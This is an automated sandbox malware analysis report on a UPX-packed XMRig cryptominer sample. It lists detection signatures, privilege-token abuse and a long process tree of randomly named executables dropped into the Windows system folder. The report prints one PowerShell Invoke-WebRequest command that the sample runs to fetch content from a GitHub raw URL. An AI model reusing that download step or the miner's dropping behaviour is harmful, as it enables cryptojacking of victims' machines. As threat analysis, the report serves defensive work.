Malware Analysis Report

2025-04-19 15:29

Sample ID 240522-ztzrqagd9v
Target 3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe
SHA256 d712366f7a06de3361ddbf4376094692bbacef687231b55bc53473c8bb510940
Tags upx, miner, xmrig, execution
Score 10/10

Analysis Overview

score
10/10

SHA256

d712366f7a06de3361ddbf4376094692bbacef687231b55bc53473c8bb510940

Threat Level: Known bad

The file 3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

upx miner xmrig execution

XMRig Miner payload

Xmrig family

xmrig

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Loads dropped DLL

UPX packed file

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Checks processor information in registry

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-22 21:01

Signatures

XMRig Miner payload

miner

Xmrig family

xmrig

UPX packed file

upx

Unsigned PE


Analysis: behavioral1

Detonation Overview

Submitted

2024-05-22 21:01

Reported

2024-05-22 21:03

Platform

win7-20240508-en

Max time kernel

150s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE


Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A

UPX packed file

upx

Drops file in Windows directory


Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory


Processes

C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "


C:\Windows\System\ssujXnN.exe

C:\Windows\System\jPqvGyY.exe

C:\Windows\System\jPqvGyY.exe

C:\Windows\System\XZnGVtf.exe

C:\Windows\System\XZnGVtf.exe

C:\Windows\System\HnDFcLa.exe

C:\Windows\System\HnDFcLa.exe

C:\Windows\System\RqApuMH.exe

C:\Windows\System\RqApuMH.exe

C:\Windows\System\lmdNEnn.exe

C:\Windows\System\lmdNEnn.exe

C:\Windows\System\jQxRhpC.exe

C:\Windows\System\jQxRhpC.exe

C:\Windows\System\CneBJKp.exe

C:\Windows\System\CneBJKp.exe

C:\Windows\System\FlpDRsg.exe

C:\Windows\System\FlpDRsg.exe

C:\Windows\System\bPchdKX.exe

C:\Windows\System\bPchdKX.exe

C:\Windows\System\jGCbKdi.exe

C:\Windows\System\jGCbKdi.exe

C:\Windows\System\NAUUaDX.exe

C:\Windows\System\NAUUaDX.exe

C:\Windows\System\yEFiCNT.exe

C:\Windows\System\yEFiCNT.exe

C:\Windows\System\UofQcYl.exe

C:\Windows\System\UofQcYl.exe

C:\Windows\System\unQjCNs.exe

C:\Windows\System\unQjCNs.exe

C:\Windows\System\FChCvGD.exe

C:\Windows\System\FChCvGD.exe

C:\Windows\System\XfHYRqT.exe

C:\Windows\System\XfHYRqT.exe

C:\Windows\System\LbjjJDP.exe

C:\Windows\System\LbjjJDP.exe

C:\Windows\System\MtpoKzU.exe

C:\Windows\System\MtpoKzU.exe

C:\Windows\System\QgosqOU.exe

C:\Windows\System\QgosqOU.exe

C:\Windows\System\qaQRERe.exe

C:\Windows\System\qaQRERe.exe

C:\Windows\System\lmyXXyM.exe

C:\Windows\System\lmyXXyM.exe

C:\Windows\System\znMvHfF.exe

C:\Windows\System\znMvHfF.exe

C:\Windows\System\HQsrfDU.exe

C:\Windows\System\HQsrfDU.exe

C:\Windows\System\exlBSex.exe

C:\Windows\System\exlBSex.exe

C:\Windows\System\gUzDGtG.exe

C:\Windows\System\gUzDGtG.exe

C:\Windows\System\seVqwRz.exe

C:\Windows\System\seVqwRz.exe

C:\Windows\System\jGBWdxj.exe

C:\Windows\System\jGBWdxj.exe

C:\Windows\System\lmtkBYp.exe

C:\Windows\System\lmtkBYp.exe

C:\Windows\System\FwNZOAi.exe

C:\Windows\System\FwNZOAi.exe

C:\Windows\System\lyLDPks.exe

C:\Windows\System\lyLDPks.exe

C:\Windows\System\uMToeCy.exe

C:\Windows\System\uMToeCy.exe

C:\Windows\System\HrtOVUo.exe

C:\Windows\System\HrtOVUo.exe

C:\Windows\System\kJePheN.exe

C:\Windows\System\kJePheN.exe

C:\Windows\System\sTuMcIV.exe

C:\Windows\System\sTuMcIV.exe

C:\Windows\System\cWpJsVi.exe

C:\Windows\System\cWpJsVi.exe

C:\Windows\System\sIjdCEh.exe

C:\Windows\System\sIjdCEh.exe

C:\Windows\System\DPCYdWA.exe

C:\Windows\System\DPCYdWA.exe

C:\Windows\System\zeiqUST.exe

C:\Windows\System\zeiqUST.exe

C:\Windows\System\PFxleKG.exe

C:\Windows\System\PFxleKG.exe

C:\Windows\System\WmXxZiP.exe

C:\Windows\System\WmXxZiP.exe

C:\Windows\System\PVvaqMT.exe

C:\Windows\System\PVvaqMT.exe

C:\Windows\System\ZVGBilD.exe

C:\Windows\System\ZVGBilD.exe

C:\Windows\System\dIQcoUI.exe

C:\Windows\System\dIQcoUI.exe

C:\Windows\System\LLIiuwg.exe

C:\Windows\System\LLIiuwg.exe

C:\Windows\System\pooLhlm.exe

C:\Windows\System\pooLhlm.exe

C:\Windows\System\iCJeOBE.exe

C:\Windows\System\iCJeOBE.exe

C:\Windows\System\IbCvtwQ.exe

C:\Windows\System\IbCvtwQ.exe

C:\Windows\System\CFAIelv.exe

C:\Windows\System\CFAIelv.exe

C:\Windows\System\ugHKuTq.exe

C:\Windows\System\ugHKuTq.exe

C:\Windows\System\sQTxtLQ.exe

C:\Windows\System\sQTxtLQ.exe

C:\Windows\System\fmqzYDp.exe

C:\Windows\System\fmqzYDp.exe

C:\Windows\System\BnNYojY.exe

C:\Windows\System\BnNYojY.exe

C:\Windows\System\RWFFuWM.exe

C:\Windows\System\RWFFuWM.exe

C:\Windows\System\GCWFIZE.exe

C:\Windows\System\GCWFIZE.exe

C:\Windows\System\vmAguiN.exe

C:\Windows\System\vmAguiN.exe

C:\Windows\System\nDxtZEE.exe

C:\Windows\System\nDxtZEE.exe

C:\Windows\System\bfKMSbn.exe

C:\Windows\System\bfKMSbn.exe

C:\Windows\System\ngGPWQI.exe

C:\Windows\System\ngGPWQI.exe

C:\Windows\System\cZXkTBo.exe

C:\Windows\System\cZXkTBo.exe

C:\Windows\System\QEbCusP.exe

C:\Windows\System\QEbCusP.exe

C:\Windows\System\FxVvOqF.exe

C:\Windows\System\FxVvOqF.exe

C:\Windows\System\YxJtGXG.exe

C:\Windows\System\YxJtGXG.exe

C:\Windows\System\snXZTSL.exe

C:\Windows\System\snXZTSL.exe

C:\Windows\System\UctVsZg.exe

C:\Windows\System\UctVsZg.exe

C:\Windows\System\ttNowMt.exe

C:\Windows\System\ttNowMt.exe

C:\Windows\System\FYsJEWO.exe

C:\Windows\System\FYsJEWO.exe

C:\Windows\System\tzjTspy.exe

C:\Windows\System\tzjTspy.exe

C:\Windows\System\mkUFxkq.exe

C:\Windows\System\mkUFxkq.exe

C:\Windows\System\kYxgCzD.exe

C:\Windows\System\kYxgCzD.exe

C:\Windows\System\uzFxcRW.exe

C:\Windows\System\uzFxcRW.exe

C:\Windows\System\XQlFJqU.exe

C:\Windows\System\XQlFJqU.exe

C:\Windows\System\sXIORji.exe

C:\Windows\System\sXIORji.exe

C:\Windows\System\zFxKPCp.exe

C:\Windows\System\zFxKPCp.exe

C:\Windows\System\TaGqLOI.exe

C:\Windows\System\TaGqLOI.exe

C:\Windows\System\brhBTvR.exe

C:\Windows\System\brhBTvR.exe

C:\Windows\System\ePlBdqv.exe

C:\Windows\System\ePlBdqv.exe

C:\Windows\System\BmunMzd.exe

C:\Windows\System\BmunMzd.exe

C:\Windows\System\RSUUVMC.exe

C:\Windows\System\RSUUVMC.exe

C:\Windows\System\WmlZngf.exe

C:\Windows\System\WmlZngf.exe

C:\Windows\System\PbMpyia.exe

C:\Windows\System\PbMpyia.exe

C:\Windows\System\srUJflf.exe

C:\Windows\System\srUJflf.exe

C:\Windows\System\jeOfGwB.exe

C:\Windows\System\jeOfGwB.exe

C:\Windows\System\wsmYBjR.exe

C:\Windows\System\wsmYBjR.exe

C:\Windows\System\ScicJcH.exe

C:\Windows\System\ScicJcH.exe

C:\Windows\System\qqDzMOR.exe

C:\Windows\System\qqDzMOR.exe

C:\Windows\System\hjWqAme.exe

C:\Windows\System\hjWqAme.exe

C:\Windows\System\iUQlCge.exe

C:\Windows\System\iUQlCge.exe

C:\Windows\System\tLmumjh.exe

C:\Windows\System\tLmumjh.exe

C:\Windows\System\LuJIbcu.exe

C:\Windows\System\LuJIbcu.exe

C:\Windows\System\ZhKNkUr.exe

C:\Windows\System\ZhKNkUr.exe

C:\Windows\System\ACTKJdc.exe

C:\Windows\System\ACTKJdc.exe

C:\Windows\System\XqZhVHO.exe

C:\Windows\System\XqZhVHO.exe

C:\Windows\System\CXwsjbj.exe

C:\Windows\System\CXwsjbj.exe

C:\Windows\System\PjGwSrd.exe

C:\Windows\System\PjGwSrd.exe

C:\Windows\System\LUKObKq.exe

C:\Windows\System\LUKObKq.exe

C:\Windows\System\dWkzZFQ.exe

C:\Windows\System\dWkzZFQ.exe

C:\Windows\System\atbbESi.exe

C:\Windows\System\atbbESi.exe

C:\Windows\System\ubtoQHc.exe

C:\Windows\System\ubtoQHc.exe

C:\Windows\System\vfNleeK.exe

C:\Windows\System\vfNleeK.exe

C:\Windows\System\QCoJosT.exe

C:\Windows\System\QCoJosT.exe

C:\Windows\System\EjaqvRM.exe

C:\Windows\System\EjaqvRM.exe

C:\Windows\System\JRkGLaN.exe

C:\Windows\System\JRkGLaN.exe

C:\Windows\System\UadKfat.exe

C:\Windows\System\UadKfat.exe

C:\Windows\System\ehdZmHE.exe

C:\Windows\System\ehdZmHE.exe

C:\Windows\System\DeNDfUT.exe

C:\Windows\System\DeNDfUT.exe

C:\Windows\System\Cdnjunm.exe

C:\Windows\System\Cdnjunm.exe

C:\Windows\System\jGaVFgw.exe

C:\Windows\System\jGaVFgw.exe

C:\Windows\System\IcbzijJ.exe

C:\Windows\System\IcbzijJ.exe

C:\Windows\System\qHlryKK.exe

C:\Windows\System\qHlryKK.exe

C:\Windows\System\CfVJzmO.exe

C:\Windows\System\CfVJzmO.exe

C:\Windows\System\LGOlNGN.exe

C:\Windows\System\LGOlNGN.exe

C:\Windows\System\oUynilX.exe

C:\Windows\System\oUynilX.exe

C:\Windows\System\kqrSafn.exe

C:\Windows\System\kqrSafn.exe

C:\Windows\System\fZiUGqc.exe

C:\Windows\System\fZiUGqc.exe

C:\Windows\System\nHXckGj.exe

C:\Windows\System\nHXckGj.exe

C:\Windows\System\fKIjFLM.exe

C:\Windows\System\fKIjFLM.exe

C:\Windows\System\owmwmOj.exe

C:\Windows\System\owmwmOj.exe

C:\Windows\System\yCVEVMc.exe

C:\Windows\System\yCVEVMc.exe

C:\Windows\System\ObLnXNj.exe

C:\Windows\System\ObLnXNj.exe

C:\Windows\System\xFFjCCE.exe

C:\Windows\System\xFFjCCE.exe

C:\Windows\System\UhpxyzS.exe

C:\Windows\System\UhpxyzS.exe

C:\Windows\System\zGMmhlN.exe

C:\Windows\System\zGMmhlN.exe

C:\Windows\System\sMeZLgT.exe

C:\Windows\System\sMeZLgT.exe

C:\Windows\System\qWGBhOB.exe

C:\Windows\System\qWGBhOB.exe

C:\Windows\System\XeivFiZ.exe

C:\Windows\System\XeivFiZ.exe

C:\Windows\System\nATAjZT.exe

C:\Windows\System\nATAjZT.exe

C:\Windows\System\ibiqjmg.exe

C:\Windows\System\ibiqjmg.exe

C:\Windows\System\spjxHlp.exe

C:\Windows\System\spjxHlp.exe

C:\Windows\System\AzVKSmb.exe

C:\Windows\System\AzVKSmb.exe

C:\Windows\System\SpNGUyV.exe

C:\Windows\System\SpNGUyV.exe

C:\Windows\System\ZLfYYIr.exe

C:\Windows\System\ZLfYYIr.exe

C:\Windows\System\gtfhsFa.exe

C:\Windows\System\gtfhsFa.exe

C:\Windows\System\DiOuCxI.exe

C:\Windows\System\DiOuCxI.exe

C:\Windows\System\ayMtnxm.exe

C:\Windows\System\ayMtnxm.exe

C:\Windows\System\TyMUnwH.exe

C:\Windows\System\TyMUnwH.exe

C:\Windows\System\XPkzfNz.exe

C:\Windows\System\XPkzfNz.exe

C:\Windows\System\dSIIDTk.exe

C:\Windows\System\dSIIDTk.exe

C:\Windows\System\TQvbKTc.exe

C:\Windows\System\TQvbKTc.exe

C:\Windows\System\ERcfUMI.exe

C:\Windows\System\ERcfUMI.exe

C:\Windows\System\YSqQbIg.exe

C:\Windows\System\YSqQbIg.exe

C:\Windows\System\xihUGhQ.exe

C:\Windows\System\xihUGhQ.exe

C:\Windows\System\yZnlscs.exe

C:\Windows\System\yZnlscs.exe

C:\Windows\System\LEeeVNy.exe

C:\Windows\System\LEeeVNy.exe

C:\Windows\System\rIaHORf.exe

C:\Windows\System\rIaHORf.exe

C:\Windows\System\DGguAYw.exe

C:\Windows\System\DGguAYw.exe

C:\Windows\System\lPLDQso.exe

C:\Windows\System\lPLDQso.exe

C:\Windows\System\lvSAHcH.exe

C:\Windows\System\lvSAHcH.exe

C:\Windows\System\uOWnfIF.exe

C:\Windows\System\uOWnfIF.exe

C:\Windows\System\PkpFONd.exe

C:\Windows\System\PkpFONd.exe

C:\Windows\System\AqbhmWB.exe

C:\Windows\System\AqbhmWB.exe

C:\Windows\System\GOZFncf.exe

C:\Windows\System\GOZFncf.exe

C:\Windows\System\KWklUbV.exe

C:\Windows\System\KWklUbV.exe

C:\Windows\System\zoKwGQP.exe

C:\Windows\System\zoKwGQP.exe

C:\Windows\System\rCQjtht.exe

C:\Windows\System\rCQjtht.exe

C:\Windows\System\PQkrNdx.exe

C:\Windows\System\PQkrNdx.exe

C:\Windows\System\yszSlbZ.exe

C:\Windows\System\yszSlbZ.exe

C:\Windows\System\rEwYadD.exe

C:\Windows\System\rEwYadD.exe

C:\Windows\System\HwflFoG.exe

C:\Windows\System\HwflFoG.exe

C:\Windows\System\zSyiBGA.exe

C:\Windows\System\zSyiBGA.exe

C:\Windows\System\fSHSHRj.exe

C:\Windows\System\fSHSHRj.exe

C:\Windows\System\mYHmEDY.exe

C:\Windows\System\mYHmEDY.exe

C:\Windows\System\bwsCpFp.exe

C:\Windows\System\bwsCpFp.exe

C:\Windows\System\QgUBoXz.exe

C:\Windows\System\QgUBoXz.exe

C:\Windows\System\VjdFfCp.exe

C:\Windows\System\VjdFfCp.exe

C:\Windows\System\ZpPnOfb.exe

C:\Windows\System\ZpPnOfb.exe

C:\Windows\System\FPICBHT.exe

C:\Windows\System\FPICBHT.exe

C:\Windows\System\EJLOqmK.exe

C:\Windows\System\EJLOqmK.exe

C:\Windows\System\ERLgpGw.exe

C:\Windows\System\ERLgpGw.exe

C:\Windows\System\gnWRoSM.exe

C:\Windows\System\gnWRoSM.exe

C:\Windows\System\spoDzPr.exe

C:\Windows\System\spoDzPr.exe

C:\Windows\System\KozrBip.exe

C:\Windows\System\KozrBip.exe

C:\Windows\System\zNgcDIC.exe

C:\Windows\System\zNgcDIC.exe

C:\Windows\System\BTemJKo.exe

C:\Windows\System\BTemJKo.exe

C:\Windows\System\HAmQIRQ.exe

C:\Windows\System\HAmQIRQ.exe

C:\Windows\System\qSnJFyh.exe

C:\Windows\System\qSnJFyh.exe

C:\Windows\System\FAQZEvu.exe

C:\Windows\System\FAQZEvu.exe

C:\Windows\System\YTyRqMM.exe

C:\Windows\System\YTyRqMM.exe

C:\Windows\System\pgdOczu.exe

C:\Windows\System\pgdOczu.exe

C:\Windows\System\hYmachF.exe

C:\Windows\System\hYmachF.exe

C:\Windows\System\fDleOog.exe

C:\Windows\System\fDleOog.exe

C:\Windows\System\HEUOcZX.exe

C:\Windows\System\HEUOcZX.exe

C:\Windows\System\oMvTqFN.exe

C:\Windows\System\oMvTqFN.exe

C:\Windows\System\VtnxcTH.exe

C:\Windows\System\VtnxcTH.exe

C:\Windows\System\OUFjUAT.exe

C:\Windows\System\OUFjUAT.exe

C:\Windows\System\MqkldjB.exe

C:\Windows\System\MqkldjB.exe

C:\Windows\System\iVTWsfg.exe

C:\Windows\System\iVTWsfg.exe

C:\Windows\System\qzdpqxq.exe

C:\Windows\System\qzdpqxq.exe

C:\Windows\System\aaEXPNQ.exe

C:\Windows\System\aaEXPNQ.exe

C:\Windows\System\LLIJlug.exe

C:\Windows\System\LLIJlug.exe

C:\Windows\System\YSzzfIE.exe

C:\Windows\System\YSzzfIE.exe

C:\Windows\System\FTfptGE.exe

C:\Windows\System\FTfptGE.exe

C:\Windows\System\XbLjcoR.exe

C:\Windows\System\XbLjcoR.exe

C:\Windows\System\JsRjnmd.exe

C:\Windows\System\JsRjnmd.exe

C:\Windows\System\nijluyS.exe

C:\Windows\System\nijluyS.exe

C:\Windows\System\DlVqUgY.exe

C:\Windows\System\DlVqUgY.exe

C:\Windows\System\JWJZuLS.exe

C:\Windows\System\JWJZuLS.exe

C:\Windows\System\ZTniwrJ.exe

C:\Windows\System\ZTniwrJ.exe

C:\Windows\System\NEhddXO.exe

C:\Windows\System\NEhddXO.exe

C:\Windows\System\XmjNGmw.exe

C:\Windows\System\XmjNGmw.exe

C:\Windows\System\qjUDHeC.exe

C:\Windows\System\qjUDHeC.exe

C:\Windows\System\NKeeUFL.exe

C:\Windows\System\NKeeUFL.exe

C:\Windows\System\erJTmHz.exe

C:\Windows\System\erJTmHz.exe

C:\Windows\System\OmOhxGs.exe

C:\Windows\System\OmOhxGs.exe

C:\Windows\System\EIfHJLm.exe

C:\Windows\System\EIfHJLm.exe

C:\Windows\System\YSZLKnt.exe

C:\Windows\System\YSZLKnt.exe

C:\Windows\System\oHYDWJa.exe

C:\Windows\System\oHYDWJa.exe

C:\Windows\System\rbvFZhr.exe

C:\Windows\System\rbvFZhr.exe

C:\Windows\System\yvZgiPz.exe

C:\Windows\System\yvZgiPz.exe

C:\Windows\System\DderyIm.exe

C:\Windows\System\DderyIm.exe

C:\Windows\System\rKRtfTN.exe

C:\Windows\System\rKRtfTN.exe

C:\Windows\System\ASIcZiZ.exe

C:\Windows\System\ASIcZiZ.exe

C:\Windows\System\ZAVSsBw.exe

C:\Windows\System\ZAVSsBw.exe

C:\Windows\System\gqnWXgD.exe

C:\Windows\System\gqnWXgD.exe

C:\Windows\System\cNiwvUM.exe

C:\Windows\System\cNiwvUM.exe

C:\Windows\System\JUrvmIb.exe

C:\Windows\System\JUrvmIb.exe

C:\Windows\System\EaLuTxj.exe

C:\Windows\System\EaLuTxj.exe

C:\Windows\System\CcGlmlo.exe

C:\Windows\System\CcGlmlo.exe

C:\Windows\System\kbDnTyu.exe

C:\Windows\System\kbDnTyu.exe

C:\Windows\System\ouMYwyD.exe

C:\Windows\System\ouMYwyD.exe

C:\Windows\System\bKYehAD.exe

C:\Windows\System\bKYehAD.exe

C:\Windows\System\keczDmx.exe

C:\Windows\System\keczDmx.exe

C:\Windows\System\VTHfHav.exe

C:\Windows\System\VTHfHav.exe

C:\Windows\System\jpLnFtR.exe

C:\Windows\System\jpLnFtR.exe

C:\Windows\System\gybnGYR.exe

C:\Windows\System\gybnGYR.exe

C:\Windows\System\AGSFDyj.exe

C:\Windows\System\AGSFDyj.exe

C:\Windows\System\UeQyjlG.exe

C:\Windows\System\UeQyjlG.exe

C:\Windows\System\KBFVGqh.exe

C:\Windows\System\KBFVGqh.exe

C:\Windows\System\QHLNBYL.exe

C:\Windows\System\QHLNBYL.exe

C:\Windows\System\xQBqulR.exe

C:\Windows\System\xQBqulR.exe

C:\Windows\System\mILWzGW.exe

C:\Windows\System\mILWzGW.exe

C:\Windows\System\MpJsWxv.exe

C:\Windows\System\MpJsWxv.exe

C:\Windows\System\XGJVqVz.exe

C:\Windows\System\XGJVqVz.exe

C:\Windows\System\mCVvQwN.exe

C:\Windows\System\mCVvQwN.exe

C:\Windows\System\NGSWqis.exe

C:\Windows\System\NGSWqis.exe

C:\Windows\System\jhWZWYn.exe

C:\Windows\System\jhWZWYn.exe

C:\Windows\System\nwcdqNI.exe

C:\Windows\System\nwcdqNI.exe

C:\Windows\System\lgFmlkZ.exe

C:\Windows\System\lgFmlkZ.exe

C:\Windows\System\iHjYQZP.exe

C:\Windows\System\iHjYQZP.exe

C:\Windows\System\gnRvgqL.exe

C:\Windows\System\gnRvgqL.exe

C:\Windows\System\WxfUARf.exe

C:\Windows\System\WxfUARf.exe

C:\Windows\System\pbzZoHS.exe

C:\Windows\System\pbzZoHS.exe

C:\Windows\System\XPOxAXT.exe

C:\Windows\System\XPOxAXT.exe

C:\Windows\System\JQAkYWs.exe

C:\Windows\System\JQAkYWs.exe

C:\Windows\System\AsqNfNd.exe

C:\Windows\System\AsqNfNd.exe

C:\Windows\System\RlLxbbj.exe

C:\Windows\System\RlLxbbj.exe

C:\Windows\System\IuvKHjO.exe

C:\Windows\System\IuvKHjO.exe

C:\Windows\System\cwrQsfe.exe

C:\Windows\System\cwrQsfe.exe

C:\Windows\System\QJOZYUc.exe

C:\Windows\System\QJOZYUc.exe

C:\Windows\System\diVGoNQ.exe

C:\Windows\System\diVGoNQ.exe

C:\Windows\System\pYKlyLy.exe

C:\Windows\System\pYKlyLy.exe

C:\Windows\System\RYpKOvu.exe

C:\Windows\System\RYpKOvu.exe

C:\Windows\System\UBpmEIT.exe

C:\Windows\System\UBpmEIT.exe

C:\Windows\System\MhHlCgt.exe

C:\Windows\System\MhHlCgt.exe

C:\Windows\System\WjuvzgO.exe

C:\Windows\System\WjuvzgO.exe

C:\Windows\System\TZXBsEO.exe

C:\Windows\System\TZXBsEO.exe

C:\Windows\System\KXfnKLQ.exe

C:\Windows\System\KXfnKLQ.exe

C:\Windows\System\UbfVMXY.exe

C:\Windows\System\UbfVMXY.exe

C:\Windows\System\AVRupgV.exe

C:\Windows\System\AVRupgV.exe

C:\Windows\System\qHxIQhC.exe

C:\Windows\System\qHxIQhC.exe

C:\Windows\System\yVdVLGH.exe

C:\Windows\System\yVdVLGH.exe

C:\Windows\System\gEBUAAA.exe

C:\Windows\System\gEBUAAA.exe

C:\Windows\System\ksVNjyA.exe

C:\Windows\System\ksVNjyA.exe

C:\Windows\System\DWXszKT.exe

C:\Windows\System\DWXszKT.exe

C:\Windows\System\whFplCs.exe

C:\Windows\System\whFplCs.exe

C:\Windows\System\HhbnwIL.exe

C:\Windows\System\HhbnwIL.exe

C:\Windows\System\tXLAoKB.exe

C:\Windows\System\tXLAoKB.exe

C:\Windows\System\ivvKZpA.exe

C:\Windows\System\ivvKZpA.exe

C:\Windows\System\ddOyGDc.exe

C:\Windows\System\ddOyGDc.exe

C:\Windows\System\EgWFXrG.exe

C:\Windows\System\EgWFXrG.exe

C:\Windows\System\sYbQIUV.exe

C:\Windows\System\sYbQIUV.exe

C:\Windows\System\zTlHDED.exe

C:\Windows\System\zTlHDED.exe

C:\Windows\System\lrkndNO.exe

C:\Windows\System\lrkndNO.exe

C:\Windows\System\pWyVCZE.exe

C:\Windows\System\pWyVCZE.exe

C:\Windows\System\ESUGQla.exe

C:\Windows\System\ESUGQla.exe

C:\Windows\System\pzpsaGs.exe

C:\Windows\System\pzpsaGs.exe

C:\Windows\System\poPGJQP.exe

C:\Windows\System\poPGJQP.exe

C:\Windows\System\cdacROL.exe

C:\Windows\System\cdacROL.exe

C:\Windows\System\jSHXAqf.exe

C:\Windows\System\jSHXAqf.exe

C:\Windows\System\PgpDmyd.exe

C:\Windows\System\PgpDmyd.exe

C:\Windows\System\dvahwLD.exe

C:\Windows\System\dvahwLD.exe

C:\Windows\System\KYomJoG.exe

C:\Windows\System\KYomJoG.exe

C:\Windows\System\FJjRAxB.exe

C:\Windows\System\FJjRAxB.exe

C:\Windows\System\SzGQDMh.exe

C:\Windows\System\SzGQDMh.exe

C:\Windows\System\JfobceT.exe

C:\Windows\System\JfobceT.exe

C:\Windows\System\IJpkGel.exe

C:\Windows\System\IJpkGel.exe

C:\Windows\System\wiZMZIG.exe

C:\Windows\System\wiZMZIG.exe

C:\Windows\System\PpkLLnk.exe

C:\Windows\System\PpkLLnk.exe

C:\Windows\System\FxjizCV.exe

C:\Windows\System\FxjizCV.exe

C:\Windows\System\XszNWxC.exe

C:\Windows\System\XszNWxC.exe

C:\Windows\System\cNxQcZp.exe

C:\Windows\System\cNxQcZp.exe

C:\Windows\System\OoBFPGz.exe

C:\Windows\System\OoBFPGz.exe

C:\Windows\System\gqZFOgf.exe

C:\Windows\System\gqZFOgf.exe

C:\Windows\System\NzzTRZl.exe

C:\Windows\System\NzzTRZl.exe

C:\Windows\System\ZYMSZhO.exe

C:\Windows\System\ZYMSZhO.exe

C:\Windows\System\gmnkMgW.exe

C:\Windows\System\gmnkMgW.exe

C:\Windows\System\RBUbIzE.exe

C:\Windows\System\RBUbIzE.exe

C:\Windows\System\XRTIwsL.exe

C:\Windows\System\XRTIwsL.exe

C:\Windows\System\xJRCrND.exe

C:\Windows\System\xJRCrND.exe

C:\Windows\System\alQyOcW.exe

C:\Windows\System\alQyOcW.exe

C:\Windows\System\dLqWBUD.exe

C:\Windows\System\dLqWBUD.exe

C:\Windows\System\cyctvKQ.exe

C:\Windows\System\cyctvKQ.exe

C:\Windows\System\TWOTMWm.exe

C:\Windows\System\TWOTMWm.exe

C:\Windows\System\hFTAcRw.exe

C:\Windows\System\hFTAcRw.exe

C:\Windows\System\nELSJaH.exe

C:\Windows\System\nELSJaH.exe

C:\Windows\System\YKjYryI.exe

C:\Windows\System\YKjYryI.exe

C:\Windows\System\UEXjGHq.exe

C:\Windows\System\UEXjGHq.exe

C:\Windows\System\ffASXAn.exe

C:\Windows\System\ffASXAn.exe

C:\Windows\System\TgxYUEK.exe

C:\Windows\System\TgxYUEK.exe

C:\Windows\System\PnmTMYZ.exe

C:\Windows\System\PnmTMYZ.exe

C:\Windows\System\dMSVMFc.exe

C:\Windows\System\dMSVMFc.exe

C:\Windows\System\zcrtNXU.exe

C:\Windows\System\zcrtNXU.exe

C:\Windows\System\pzzWOME.exe

C:\Windows\System\pzzWOME.exe

C:\Windows\System\IegDHYF.exe

C:\Windows\System\IegDHYF.exe

C:\Windows\System\rNyjNiL.exe

C:\Windows\System\rNyjNiL.exe

C:\Windows\System\KVRDJSr.exe

C:\Windows\System\KVRDJSr.exe

C:\Windows\System\nskyVBD.exe

C:\Windows\System\nskyVBD.exe

C:\Windows\System\wlKPtyh.exe

C:\Windows\System\wlKPtyh.exe

C:\Windows\System\LXwWvCp.exe

C:\Windows\System\LXwWvCp.exe

C:\Windows\System\gbRkYiL.exe

C:\Windows\System\gbRkYiL.exe

C:\Windows\System\BDcRJwW.exe

C:\Windows\System\BDcRJwW.exe

C:\Windows\System\gyzmEps.exe

C:\Windows\System\gyzmEps.exe

C:\Windows\System\kVcNWhf.exe

C:\Windows\System\kVcNWhf.exe

C:\Windows\System\jsAjvQg.exe

C:\Windows\System\jsAjvQg.exe

C:\Windows\System\uUHFJCV.exe

C:\Windows\System\uUHFJCV.exe

C:\Windows\System\divstIx.exe

C:\Windows\System\divstIx.exe

C:\Windows\System\KAoVYzy.exe

C:\Windows\System\KAoVYzy.exe

C:\Windows\System\ikoRmWy.exe

C:\Windows\System\ikoRmWy.exe

C:\Windows\System\msjwIOF.exe

C:\Windows\System\msjwIOF.exe

C:\Windows\System\ybqhwAT.exe

C:\Windows\System\ybqhwAT.exe

C:\Windows\System\nIOArcx.exe

C:\Windows\System\nIOArcx.exe

C:\Windows\System\fiGoMpN.exe

C:\Windows\System\fiGoMpN.exe

C:\Windows\System\oWshYUz.exe

C:\Windows\System\oWshYUz.exe

C:\Windows\System\SqrBpvc.exe

C:\Windows\System\SqrBpvc.exe

C:\Windows\System\FYGuejF.exe

C:\Windows\System\FYGuejF.exe

C:\Windows\System\fzMeOrZ.exe

C:\Windows\System\fzMeOrZ.exe

C:\Windows\System\UwUTNlf.exe

C:\Windows\System\UwUTNlf.exe

C:\Windows\System\xXxHfrb.exe

C:\Windows\System\xXxHfrb.exe

C:\Windows\System\tfjtmSl.exe

C:\Windows\System\tfjtmSl.exe

C:\Windows\System\LIRgLmY.exe

C:\Windows\System\LIRgLmY.exe

C:\Windows\System\bjjZhXb.exe

C:\Windows\System\bjjZhXb.exe

C:\Windows\System\XGepcuX.exe

C:\Windows\System\XGepcuX.exe

C:\Windows\System\evEfcFf.exe

C:\Windows\System\evEfcFf.exe

C:\Windows\System\aRUGgEy.exe

C:\Windows\System\aRUGgEy.exe

C:\Windows\System\yZtrigD.exe

